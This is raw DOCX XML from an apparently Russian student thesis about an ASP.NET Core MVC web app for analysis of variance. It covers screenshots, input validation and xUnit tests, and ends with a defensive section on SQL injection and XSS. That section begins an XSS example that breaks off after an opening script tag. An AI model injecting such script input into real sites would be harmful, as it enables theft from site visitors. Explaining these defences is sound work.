          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342560EE" wp14:editId="1904485B">
            <wp:extent cx="5267325" cy="3743325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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67325" cy="3743325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0EAD91" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Рисунок 23 – график отображения скорости и направления ветра, где по оси абсцисс – время, по оси ординат – фактические значения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C155BC" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="6FBCD18C" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126D1D2E" wp14:editId="7F052D19">
            <wp:extent cx="5681428" cy="4125433"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="5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691068" cy="4132433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFE97C" w14:textId="4DDCB9FF" w:rsidR="00E662A4" w:rsidRPr="00061001" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Главная страница веб-приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6D59A" w14:textId="4542A5DA" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="6F234A4A" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48234887" wp14:editId="0CA245E0">
            <wp:extent cx="4086225" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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086225" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5E707" w14:textId="3177CDC4" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – окно входа в аккаунт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DCD1FC" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485F6C41" wp14:editId="0FC8D734">
            <wp:extent cx="4029075" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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029075" cy="3962400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77706D3C" w14:textId="789AB4CE" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – окно регистрации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B9BF2" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26F49459" wp14:editId="0FEBE57D">
            <wp:extent cx="5238750" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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38750" cy="1847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A6436" w14:textId="30CCEFE2" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – изменённая страница, после прохождения процедуры аутентификации и авторизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E187CB" w14:textId="4EE5AAD8" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="0B4810BB" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060CB870" wp14:editId="310C5703">
            <wp:extent cx="5057775" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61"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057775" cy="3981450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B698B1" w14:textId="553B98ED" w:rsidR="00E662A4" w:rsidRPr="00A069BF" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – вкладка «Анализ»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8126F" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="4F3B2BD7" w14:textId="2B0D3DF4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00EB413D">
      <w:r>
        <w:t>На мобильной версии элементы расположены не в ширину, а в длину страницы, потому что экран мобильных телефонов слишком узок, также в мобильной версии реализовано выпадающее меню:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DAED9" w14:textId="4C8F6D1A" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62AD7C1D" wp14:editId="29A8D210">
            <wp:extent cx="3028950" cy="6143625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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028950" cy="6143625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F98936" w14:textId="5478846B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Выпадающее меню в закрытом положении (кнопка в правом верхнем углу).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37118FF2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CBFAA6" w14:textId="5B714CB8" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="347F5408" wp14:editId="4A5FE216">
            <wp:extent cx="2724150" cy="5591175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72"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724150" cy="5591175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="275B93F0" w14:textId="06B080E5" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Выпадающее меню в открытом положении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F472BA9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004B746E">
      <w:r>
        <w:t xml:space="preserve">Данный функционал реализован с помощью чистого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> если на компьютере пользователя не поддерживается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>кнопка открытия меню не будет отображаться, так как переключение между состояниями работать не будет. В этом случае меню будет находиться в потоке документа (открытое меню не будет накладываться поверх остальных элементов), и все элементы сайта, как и пункты меню будут видны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6862EB8D" w14:textId="493655BE" w:rsidR="0093378B" w:rsidRPr="000F55F8" w:rsidRDefault="00BA1029" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7752D" wp14:editId="2980B1EB">
            <wp:extent cx="3209925" cy="6429375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73"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209925" cy="6429375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3757D" w14:textId="03768660" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Выпадающее меню при отключенном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEFA26" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000F55F8">
      <w:r>
        <w:t>На вкладке «Анализ» пользователь может ввести неправильные входные данные: могут присутствовать нечисловые символы, пробелы или поле ввода данных буду просто пустым. В таком случае пользователь получит сообщение «Ошибка при вводе данных»:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF776C" w14:textId="79348DDA" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65E6F0A6" wp14:editId="44046F74">
            <wp:extent cx="4562475" cy="2105025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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562475" cy="2105025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34952820" w14:textId="0ED5EAA5" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Сообщение об ошибке при неправильно введённых данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F977C01" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4"/>
    <w:p w14:paraId="59312ED0" w14:textId="7354FA44" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000F55F8">
      <w:r>
        <w:t xml:space="preserve">Также для проверки работы самого алгоритма дисперсионного анализа в проект были добавлены </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> тесты. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F55F8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">это инфраструктура модульного тестирования, которая применяется для приложений </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="000F55F8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Суть модульных тестов заключается в следующем: создаётся специальный класс с тестовыми методами, помеченными атрибутами тестовых процедур. В тестовые методы создаются экземпляры разработанных в приложении классов, и вызываются методы. Возвращаемые значения методов сравниваются с эталонными значениями. Однофакторный дисперсионный анализ и функция ранжирования данных хорошо подходят в качестве тестируемых объектов. В качестве эталонных данных были взяты расчёты из книги </w:t>
      </w:r>
      <w:r w:rsidRPr="00E258B2">
        <w:t xml:space="preserve">Б.А. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E258B2">
        <w:t>Доспехова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> «Методика полевого опыта»</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> [21]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В ней в качестве примеров проводятся эксперименты с урожайностью на поле, и результаты тестируемого класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B0300">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">можно сравнить с рассчитанными в книге значениями, пример кода </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B0300">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">теста приведен в </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Д</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550E189" w14:textId="7C060D13" w:rsidR="002E57B7" w:rsidRDefault="002E57B7" w:rsidP="000F55F8">
      <w:r>
        <w:t>Отдельное внимание стоит уделить основным уязвимостям веб-приложений и методикам их устранения.</w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:t xml:space="preserve"> Сама по себе структура </w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="006A246D" w:rsidRPr="006A246D">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="006A246D" w:rsidRPr="006A246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="006A246D" w:rsidRPr="006A246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:t xml:space="preserve">уже имеет по умолчанию функциональность противодействия </w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:lastRenderedPageBreak/>
        <w:t>кибератакам и взломам, но для предохранения от абсолютного большинства интернет-угроз следует применение некоторых мер защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3085BF" w14:textId="413FB04E" w:rsidR="006A246D" w:rsidRPr="0042767C" w:rsidRDefault="006A246D" w:rsidP="000F55F8">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="006A246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – крайне распространённая атака на веб-приложение. Суть атаки заключается в том, что злоумышленник может ввести в текстовое поле </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve">на сайте </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve">команду. И если на сервере к базе данных посылаются «сырые» </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve">команды, то веб-сервис становится крайне уязвимым. В </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve">приложении очень сложно получить </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve">инъекцию т.к. к БД сервер приложения обращается через </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve"> сервер не работает напрямую с </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0042767C" w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve">кодом. Для дополнительной защиты от такого сорта атак </w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>применена</w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve"> фильтраци</w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="0042767C">
        <w:t xml:space="preserve"> входных пользовательских данных с помощью регулярных выражений к каждому элементу интерфейса, который отправляет введённые данные на сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B51061" w14:textId="2AE986C3" w:rsidR="002E57B7" w:rsidRDefault="0042767C" w:rsidP="000F55F8">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, или же межсайтовый </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>скриптинг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, также очень распространённый тип атаки на веб приложения. Типичным примером межсайтового </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>скриптинга</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> является добавления скрипта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в комментарий или в гостевую книгу, например:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3BE5B" w14:textId="6EC70B4E" w:rsidR="0042767C" w:rsidRDefault="0042767C" w:rsidP="004A1170">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
